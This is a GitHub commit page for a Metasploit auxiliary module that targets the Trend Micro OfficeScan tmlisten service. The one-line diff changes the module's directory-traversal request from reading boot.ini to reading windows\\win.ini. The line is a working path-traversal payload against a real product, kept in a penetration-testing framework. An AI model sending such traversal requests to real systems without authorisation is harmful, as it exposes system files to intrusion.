Skip to content

Commit 44b9dc9

Browse files
committed
Update tmlisten_traversal
1 parent 08ce278 commit 44b9dc9

File tree

1 file changed

+1
-1
lines changed

1 file changed

+1
-1
lines changed

modules/auxiliary/admin/officescan/tmlisten_traversal.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -40,7 +40,7 @@ def run_host(target_host)
4040

4141
res = send_request_raw(
4242
{
43-
'uri' => '/activeupdate/../../../../../../../../../../../boot.ini',
43+
'uri' => '/activeupdate/../../../../../../../../../../../windows\\win.ini',
4444
'method' => 'GET',
4545
}, 20)
4646

0 commit comments

Comments
 (0)